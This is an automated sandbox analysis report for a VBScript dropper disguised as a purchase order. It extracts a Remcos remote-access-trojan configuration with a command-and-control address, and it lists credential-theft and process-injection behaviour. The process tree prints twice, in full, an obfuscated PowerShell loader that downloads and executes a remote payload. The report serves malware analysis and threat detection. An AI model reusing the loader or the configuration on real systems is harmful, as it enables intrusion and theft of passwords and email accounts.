Analysis
-
max time kernel
299s -
max time network
292s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 07:37
Static task
static1
Behavioral task
behavioral1
Sample
KULI500796821_PO20000003.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
KULI500796821_PO20000003.vbs
Resource
win10v2004-20241007-en
General
-
Target
KULI500796821_PO20000003.vbs
-
Size
9KB
-
MD5
56f94f8aed310e90b5f513b1eb999c69
-
SHA1
95e42e5458cf0117c08de3c6bda83b699fa9be59
-
SHA256
a81393b534b9f803d64ca3d43f9e3b8a184a9e790ac20f2f51d347114384e7a2
-
SHA512
d53890af0815934fb10f4eb3e2eae13da5db60d21a9a89f2426de7bbb5ce7ed495a84a371d8c19ce9b707709b3d18f00bc637262a2d3fc7818333b508af4980e
-
SSDEEP
192:oiJSEy04EcieX8Qui690HKZRBijzH9Iue0LGmeHkQEvbcB1m:ouz4NHaijzH9ZNLwElDY1m
Malware Config
Extracted
remcos
RemoteHost
185.174.101.218:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TKX1UQ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4956-65-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4416-66-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2888-61-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4956-65-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4416-66-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 8 IoCs
flow pid Process 10 1124 powershell.exe 30 2244 msiexec.exe 32 2244 msiexec.exe 34 2244 msiexec.exe 35 2244 msiexec.exe 36 2244 msiexec.exe 38 2244 msiexec.exe 39 2244 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 1124 powershell.exe 2432 powershell.exe -
pid Process 1124 powershell.exe 2432 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2244 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2432 powershell.exe 2244 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2244 set thread context of 4416 2244 msiexec.exe 105 PID 2244 set thread context of 4956 2244 msiexec.exe 106 PID 2244 set thread context of 2888 2244 msiexec.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1124 powershell.exe 1124 powershell.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 2888 msiexec.exe 2888 msiexec.exe 4416 msiexec.exe 4416 msiexec.exe 4416 msiexec.exe 4416 msiexec.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 2432 powershell.exe 2244 msiexec.exe 2244 msiexec.exe 2244 msiexec.exe 2244 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 2888 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2244 msiexec.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4828 wrote to memory of 1124 4828 WScript.exe 88 PID 4828 wrote to memory of 1124 4828 WScript.exe 88 PID 2432 wrote to memory of 2244 2432 powershell.exe 103 PID 2432 wrote to memory of 2244 2432 powershell.exe 103 PID 2432 wrote to memory of 2244 2432 powershell.exe 103 PID 2432 wrote to memory of 2244 2432 powershell.exe 103 PID 2244 wrote to memory of 4416 2244 msiexec.exe 105 PID 2244 wrote to memory of 4416 2244 msiexec.exe 105 PID 2244 wrote to memory of 4416 2244 msiexec.exe 105 PID 2244 wrote to memory of 4416 2244 msiexec.exe 105 PID 2244 wrote to memory of 4956 2244 msiexec.exe 106 PID 2244 wrote to memory of 4956 2244 msiexec.exe 106 PID 2244 wrote to memory of 4956 2244 msiexec.exe 106 PID 2244 wrote to memory of 4956 2244 msiexec.exe 106 PID 2244 wrote to memory of 3764 2244 msiexec.exe 107 PID 2244 wrote to memory of 3764 2244 msiexec.exe 107 PID 2244 wrote to memory of 3764 2244 msiexec.exe 107 PID 2244 wrote to memory of 2888 2244 msiexec.exe 108 PID 2244 wrote to memory of 2888 2244 msiexec.exe 108 PID 2244 wrote to memory of 2888 2244 msiexec.exe 108 PID 2244 wrote to memory of 2888 2244 msiexec.exe 108
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KULI500796821_PO20000003.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lftdmjzkytbashizx"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4416
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nzyvntjllbtfcnwdofyp"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4956
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbdgglufzjlsftshxikredog"3⤵PID:3764
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbdgglufzjlsftshxikredog"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5320331f7dbb4a3c06062f8ac6ec1702e
SHA13a81b04c9a1266e39098f56e37c5c3a274e64403
SHA2564081e1bcabb7a01183a2272ccc69a5fdcc44120fcffe72570943cdd0f3c49a27
SHA5124f822513d20aecb20bda27ac1a28bb42dd8aa13c0cadb1daa3ebd5261298c2f7d5f6a86c2b8eeb66edecade376bc41f1e082f47cae4a79aeaab7c6ea7c1e8185
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
454KB
MD5d9ef771daefffd6c29cf32f82fc112ad
SHA101097bf85e1c7e90078bd6256b4fd8a2aba1ce20
SHA256aada34a354ca91ac52e7ba0d83fe33d7a2a8c36cd15fb07a1114e6ff90b23d5d
SHA5122a5a5649dfb8852a7245547db8f97eced1a004d013030c96d2adff2cee140ff05003e3b7e9c8adeaedcc8610108c9d77ab6ca5cdfb5939a7298c75aea1f577d9